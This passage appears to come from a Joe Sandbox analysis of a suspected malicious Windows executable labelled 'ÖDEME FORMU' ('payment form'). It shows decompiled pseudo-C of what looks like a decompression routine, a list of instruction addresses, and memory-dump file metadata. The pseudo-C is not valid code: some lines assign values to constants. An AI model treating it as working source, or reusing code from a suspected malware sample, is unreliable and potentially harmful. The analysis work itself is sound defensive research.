											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x004066b9
0x004066b9
0x004066bd
0x004066e2
0x004066ec
0x00000000
0x004066bf
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066cc
0x004066d0
0x004066d0
0x004066d3
0x004067ad
0x004067ad
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x0040676b
0x0040676b
0x0040676b
0x00405f07
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406740
0x00406744
0x004068f3
0x00000000
0x004068f3
0x00406750
0x00406757
0x0040675f
0x00406762
0x00406765
0x00406765
0x00000000
0x00000000
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x00000000
0x00406110
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f3
0x00000000
0x004060d5
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x004060ec
0x00000000
0x00406322
0x00406326
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x0040632b
0x0040632e
0x00406338
0x00000000
0x00000000
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x00000000
0x00000000
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00406440
0x00406444
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x00000000
0x0040645b
0x00406446
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x0040637a
0x0040637a
0x0040637d
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x00000000
0x004067a6
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x00000000
0x00000000
0x00406867
0x0040686a
0x0040676b
0x0040676b
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x00000000
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00406431
0x00406431
0x00000000
0x00406431
0x004066b2
0x004068e7
0x00406909
0x0040690f
0x00406911
0x00406918
0x0040691a
0x00406921
0x00406925
0x00000000
0x00405f16
0x0040691e
0x0040691e
0x00000000
0x0040691e
0x0040676b
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406848
0x00000000
0x0040684a
0x00000000
0x0040684a
0x00406848
0x00000000
0x004066bd

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
Instruction ID: d4317c89d1632f45c632c26a697e2fc4357ac15b25f122c790db5755eb07ebec
Opcode Fuzzy Hash: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
